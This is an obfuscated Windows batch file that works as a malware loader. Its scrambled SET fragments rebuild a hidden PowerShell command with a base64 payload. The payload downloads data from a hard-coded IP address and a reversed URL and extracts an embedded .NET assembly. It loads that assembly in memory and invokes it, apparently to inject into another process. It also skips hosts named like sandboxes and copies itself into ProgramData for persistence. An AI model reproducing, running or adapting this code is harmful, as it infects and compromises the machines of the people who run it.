@echo off
GOTO OHNFDNGGIK
:GNNNHFODFO
SET NSHDSNNOFG=AA+AD4AJwAKACAAIAAgACAAJABlAG4AZABUAGEAZwAgACAAIAA9ACAA
GOTO JGUDNUDGDS
:GIDODISSIJ
SET IJGDNGOGDG=AFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAY
GOTO GOINJDSING3
:FDGINFIUNN
SET IIFDNJIDGD=AAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEA
GOTO SDGIDGGJNH4
:FGNINSDIDG
SET FIDSIIJDHN=ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgB
GOTO FJHJGGDGIS
:NFSIGSIFNN
SET HJFOJSHSDN=AHQAVQByAGwAcwAgAD0AIABAACgACgAgACAAIAAgACgAJABiAGEAcwBlAFUAcgBsACAAKwAgACcAMg
GOTO DSSIONNGJS1
:FJFDNJIDDI
SET GJFHHFJGHN=AbABvAGMAawAnACwAIAAkAGkAbgBqAFYAYQBsAHUAZQAsACAAJwAwACcALAAgACcAeAA4ADYAJwAp
GOTO GNGDGNOIDJ
:DHDJSNUJFN
SET HDOGIJDIFI=gACAAIAAkAGwAbwBhAGQAZQBkAEEAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAH
GOTO GOINJDSING5
:DFDDFDGDID
SET OSNNNNOGFJ=stem.Text.encoding]::Unicode.GetString^([system.convert]::Frombase64string
GOTO OIDOOFIKDO5
:OHNFDNGGIK
SET IGGIHONKFD=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Comm
GOTO SDGIDGGJNH
:NSSGJNODJF
SET DODJIFSGFD=C8AbQBvAGMALgBiAHUAaAB0AGkAZwAvAC8AOgBzACAAZwBzAGYAaABqAGcAZgBzAGcAZgAnACAAOwAgACQAZwBnAGcAIA
GOTO DOIINDFGNI6
:DJIDONFDUJ
SET OKIOGFDNFN=0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAAoAf
GOTO SDGIDGGJNH6
:DIFGGOFSDD
SET FGHJNDKSIG=AG4AZABQAG8AcwAgAC0AZwB0ACAAJABzAHQAYQByAHQAUABvAHMAKQAgAHs
GOTO HGIJFDGJGU
:OGHDUJDGGG
SET GNDJNSGJJN=lAG4AdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQAUABvAHMALAAgACQAYgBhAHMAZQA2
GOTO FSDFIFFGGD
:FSDFIFFGGD
SET ONHDODNODF=ADQATABlAG4AZwB0AGgAKQAKAAoAIAAgACAAIAAgACAAIAAgACQAYQBzAHMAZQBtAGIAbAB5AEIAeQB0AGUAcwAgAD0AIABb
GOTO GIDODISSIJ
:GOJOOGOUNI
SET JIOISUNDIH=UgBlAG0AbwB0AGUARABhAHQAYQAgACQAdABhAHIAZwBlAHQAVQ
GOTO ODFFGUDOOO
:FOJIFGFFGN
SET JODDSJODOG=wAnACkACgAgACAAIAAgACAAIAAgAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAVgBhAGwAdQBlACAA
GOTO ONFGINGKFJ
:FJHJGGDGIS
SET SDDNNDGUSF=hAHcARABhAHQAYQApAAoAIAAgACAAIAAkAHMAdABhAHIAdABUAGEAZwAgAD0AIAAnADwAPABTAFQAQQBSACcAIAArACcAV
GOTO GNNNHFODFO
:NSIDFDOIDI
SET FUGFNGFUGG=eAB0AEMAbwBuAHQAZQBuAHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQAVABhAGcAKQAKACAAIAAgACAAJABlA
GOTO IGNNOIHDIF
:IDIJGNOSDK
SET OUHDJKJOOD=bwBoAGMAdgBzAC8AbgBpAGEAbQAvAHMAZABhAGUAaAAvAHMAZg
GOTO DOIINDFGNI3
:GOOSOOFGGI
SET SGNODKGGGU=HUAbgAnACAAKwAgACcAcwBzACcAKQAuAEkAbgB2AG8AawBlACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAk
GOTO OIDOOFIKDO0
:SDGIDGGJNH
SET NJJNJIINDI=and "Start-Process $env:SystemRoot\System32\Windows
GOTO DSSIONNGJS
:DNKDGDNOSD
SET SGNGODJFJG=ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABQAG8AcwAgAC0AIAAkAHMAdABhAHIAdABQAG8AcwAKACA
GOTO INDGOGOJDG
:GOINJDSING
SET OSNKFSDJIO=AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBj
GOTO DOIINDFGNI
:GOINJDSING3
SET GDODFOFSOU=QBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAGgAdQBuAGsAKQAKACAAIAAgACAAIAA
GOTO DHDJSNUJFN
:HGIJFDGJGU
SET INIJFUGGFS=ACgAgACAAIAAgACAAIAAgACAAJABzAHQAYQByAHQAUABvAHMAIAArAD0AIAAkAHMAdABhAH
GOTO IGGGNGIGSS
:GOINJDSING5
SET INSGDIGDGD=MAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAcwBzAGUA
GOTO GOINJDSING6
:ONFGINGKFJ
SET JDDNIFNGFI=PQAgACcAUgBlACcAIAArACAAJwBnAEEAcwBtACcACgAgACAAIAAgACAAIAAgACAAJABzAHQA
GOTO DIJOJDGUDG
:IGGGNGIGSS
SET GNIDIUONSN=IAdABUAGEAZwAuAEwAZQBuAGcAdABoAAoAIAAgACAAIAAgACAAIAAg
GOTO DNKDGDNOSD
:GOINJDSING7
SET ODINODUJNN=ABhAHIAZwBlAHQAVAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAE
GOTO GOINJDSING8
:GOINJDSING6
SET HJIIOONGOI=bQBiAGwAeQBCAHkAdABlAHMAKQAKAAoAIAAgACAAIAAgACAAIAAgACQAd
GOTO GOINJDSING7
:GOINJDSING8
SET IGNIGJFIDD=EAcwBtAC4ARwBlAHQAVAB5AHAAZQAoACcAbQB5AHAAcgBvAGcAcgBhAG0ALgBIAG8AbQBlAGUAc
GOTO FOJIFGFFGN
:SDGIDGGJNH8
SET DIDISFIFIN=gACgAKABoAG8AcwB0AG4AYQBtAGUAKQAgAC0AbABpAGsAZQAgACcAKgBjAGwAZQBhAG4AKgAnAC
GOTO SDGIDGGJNH9
:DIJOJDGUDG
SET GOFSFJUDIJ=cgAgAD0AIAAnADEAJwAKACAAIAAgACAAIAAgACAAIAAkAGcAZwBnACAAPQAgACcAdAB4AHQALgBkAGEAbwBsAHAAdQB0AHMA
GOTO IDIJGNOSDK
:JISSGJNGHG
%IGGIHONKFD%%NJJNJIINDI%%JGIFDOOSUO%%JGGGDDGIOG%%OSNKFSDJIO%%NSUJJUGGIO%%OGGFGGNISS%%GNOGNNSJDU%%NDDFFJFSOD%%NDOONJDNFJ%%DNFFNODNIJ%%NGHDUDDJGG%%ISOSDSDDJF%%IIFDNJIDGD%%SFNOFODODI%%OKIOGFDNFN%%IGJJGFNJJF%%FIDGIDGFOO%%DIDISFIFIN%%GIFFGDGJOG%%HJFOJSHSDN%%NGNOKFDFOS%%GFGGGDFSGF%%ONFIIUDKFD%%JIOISUNDIH%%JOIFDDIDSK%%SKIGGNOGGN%%FIDSIIJDHN%%SDDNNDGUSF%%NSHDSNNOFG%%SSDFONJUOF%%FUGFNGFUGG%%OKHIGNGFJG%%IJSNOFFIDF%%DJGFDNOGKF%%FGHJNDKSIG%%INIJFUGGFS%%GNIDIUONSN%%SGNGODJFJG%%SGIUIGJIKI%%GNDJNSGJJN%%ONHDODNODF%%IJGDNGOGDG%%GDODFOFSOU%%HDOGIJDIFI%%INSGDIGDGD%%HJIIOONGOI%%ODINODUJNN%%IGNIGJFIDD%%JODDSJODOG%%JDDNIFNGFI%%GOFSFJUDIJ%%OUHDJKJOOD%%NIISDOUNDS%%GIODHIGGHI%%DODJIFSGFD%%DKFOFDJUFG%%UGIDONGFSI%%FJJOJGIIGF%%SGNODKGGGU%%JNIDKIDOFJ%%SIDGNSSFJI%%GJFHHFJGHN%%NOOIKSFIFN%%OSNNNNOGFJ%%IFFDNGGGJS%%IGGFSFJDIJ%%NFGJSDONIG%
GOTO OIDOOFIKDO9
:DISONIUNSU
SET FJJOJGIIGF=hAHIAZwBlAHQAVAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwByA
GOTO GOOSOOFGGI
:ODFFGUDOOO
SET JOIFDDIDSK=ByAGwAcwAKAGkAZgAgACgAJAByAGEAdwBEAGEAdABhACAALQBuAGUAIAAkAG4AdQ
GOTO DSSIONNGJS6
:SDGIDGGJNH0
SET DNFFNODNIJ=ZQByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAdQByAGwAcwAgAC0AQwB
GOTO SDGIDGGJNH1
:SDGIDGGJNH2
SET ISOSDSDDJF=gACQAcgBhAG4AZABvAG0ATwByAGQAZQByACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuAC
GOTO FDGINFIUNN
:GFJDDGNJSN
SET IJSNOFFIDF=ZABlAHgATwBmACgAJABlAG4AZABUAGEAZwApAAoACgAgACAAIAAgAGkAZ
GOTO JOGOIIJSIO
:DDNGGJIFNF
SET NDDFFJFSOD=jAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAG
GOTO JGNDDJOONF
:DOIINDFGNI
SET NSUJJUGGIO=AG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAKAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBSAGUAbQBvAHQAZQ
GOTO OIDOOFIKDO
:INDGOGOJDG
SET SGIUIGJIKI=AIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAaAB1AG4AawAgAD0AIAAkAHQAZQB4AHQAQwBvAG4AdAB
GOTO OGHDUJDGGG
:GNGDGNOIDJ
SET NOOIKSFIFN=AAoAIAAgACAAIAAgACAAIAAgACkACgAgACAAIAAgAH0ACgB9AA=='';$oWgjffuxd = [sy
GOTO DFDDFDGDID
:DSSIONNGJS
SET JGIFDOOSUO=PowerShell\v1.0\powershell.exe -WindowStyle Hidden -ArgumentList '-Command \"$jghjggghhjg = '
GOTO GGNFFJGFGI
:OIDOOFIKDO
SET OGGFGGNISS=BEAGEAdABhACAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQB
GOTO HGNGODGGFJ
:HGNGODGGFJ
SET GNOGNNSJDU=dACQAdQByAGwAcwApAAoAIAAgACAAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQB
GOTO DDNGGJIFNF
:JGUDNUDGDS
SET SSDFONJUOF=JwA8ADwARQBOAEQAPgA+ACcACgAKACAAIAAgACAAJABzAHQAYQByAHQAUABvAHMAIAA9ACAAJAB0AGUA
GOTO NSIDFDOIDI
:OIDOOFIKDO5
SET IFFDNGGGJS=^( [regex]::replace^($jghjggghhjg, ''f@'',''f''^)^)^);iex $oWgjffuxd\"'";Copy-Item -Pat
GOTO OIDOOFIKDO6
:SDGIDGGJNH9
SET GIFFGDGJOG=kAIAB7AAoAIAAgACAAIABlAHgAaQB0AAoAf@QAKACQAdABhAHIAZwBl
GOTO NFSIGSIFNN
:OIDOOFIKDO1
SET SIDGNSSFJI=oAZQBjAHQAWwBdAF0AIAAoACQAZwBnAGcAIAAgACwAIAAkAHMAdAByACwAIAAnAEM
GOTO FJFDNJIDDI
:JOGOIIJSIO
SET DJGFDNOGKF=gAgACgAJABzAHQAYQByAHQAUABvAHMAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABl
GOTO DIFGGOFSDD
:SDGIDGGJNH7
SET FIDGIDGFOO=ALwAvACcACgAkAGIAYQBzAGUAVQByAGwAIAA9ACAAJABzAGMAaABlAG0AZQAxACAAKwAgACQAcwBjAGgAZQBtAGUAMgAKAGkAZgA
GOTO SDGIDGGJNH8
:DOIINDFGNI3
SET NIISDOUNDS=BlAHIALwB3AGEAcgAvAC0AeQAxADcANwA4AC0ANwBZAC0AagBpAHUAOQA4ADgANQBSAEoASABJADkAOAAzAFkAOQA4ADQAMwA4
GOTO DOIINDFGNI4
:IGNNOIHDIF
SET OKHIGNGFJG=G4AZABQAG8AcwAgACAAIAA9ACAAJAB0AGUAeAB0AEMAbwBuAHQAZQBuAHQALgBJAG4A
GOTO GFJDDGNJSN
:OIDOOFIKDO0
SET JNIDKIDOFJ=AG4AdQBsAGwALAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAbwBiAG
GOTO OIDOOFIKDO1
:GGNFFJGFGI
SET JGGGDDGIOG='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5
GOTO GOINJDSING
:JGNDDJOONF
SET NDOONJDNFJ=kAZQBuAHQACgAgACAAIAAgACQAcgBhAG4AZABvAG0ATwByAGQA
GOTO SDGIDGGJNH0
:SDGIDGGJNH6
SET IGJJGFNJJF=@QAKACQAcwBjAGgAZQBtAGUAMQAgAD0AIAAnAGgAdAB0ACcACgAkAHMAYwBoAGUAbQBlADIAIAA9ACAAJwBwADo
GOTO SDGIDGGJNH7
:DSSIONNGJS2
SET GFGGGDFSGF=CwACgAgACAAIAAgACgAJABiAGEAcwBlAFUAcgBsACAAKwAgACcAMgAwADkALgA1ADQALgAxADAAMwAuADEAMwA
GOTO DSSIONNGJS3
:SDGIDGGJNH1
SET NGHDUDDJGG=vAHUAbgB0ACAAJAB1AHIAbABzAC4ATABlAG4AZwB0AGgACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdQAgAGkAbgA
GOTO SDGIDGGJNH2
:OIDOOFIKDO6
SET IGGFSFJDIJ=h '%~f0' -Destination 'C:\ProgramData\Clock.bat' -Force -ErrorActi
GOTO OIDOOFIKDO7
:DOIINDFGNI7
SET UGIDONGFSI=cAZwAuAEwAZQBuAGcAdABoACAALQAgADEAMQApAAoAIAAgACAAIAAgACAAIAAgAAoAIAAgACAAIAAgACAAIAAgACQAdAB
GOTO DISONIUNSU
:OIDOOFIKDO7
SET NFGJSDONIG=on SilentlyContinue"
GOTO JISSGJNGHG
:DSSIONNGJS3
SET ONFIIUDKFD=wAC8AaQBtAGcALwAxAC4AagBwAGcAJwApAAoAKQAKAAoAJAByAGEAdwBEAGEAdABhACAAPQAgAEcAZQB0AC0A
GOTO GOJOOGOUNI
:DSSIONNGJS1
SET NGNOKFDFOS=AwADkALgA1ADQALgAxADAAMwAuADEAMwAwAC8AaQBtAGcALwAxAC4AagBwAGcAJwApA
GOTO DSSIONNGJS2
:DOIINDFGNI6
SET DKFOFDJUFG=A9ACAAJABnAGcAZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAMAAsACAAJABnAG
GOTO DOIINDFGNI7
:DSSIONNGJS6
SET SKIGGNOGGN=BsAGwAKQAgAHsACgAgACAAIAAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0ACAAPQAgAFsAUwB5AHMAdABlAG0
GOTO FGNINSDIDG
:DOIINDFGNI4
SET GIODHIGGHI=AEkASAA4ADQAawBqAGEAaAB1ADgARgBIAGsAagBoAHUANAA4AC8AMwA4ADgANQBpAHIAdQB5A
GOTO NSSGJNODJF
:SDGIDGGJNH4
SET SFNOFODODI=dABhACgAJAB1ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ACgAgACAAIAAgAH
GOTO DJIDONFDUJ
:OIDOOFIKDO9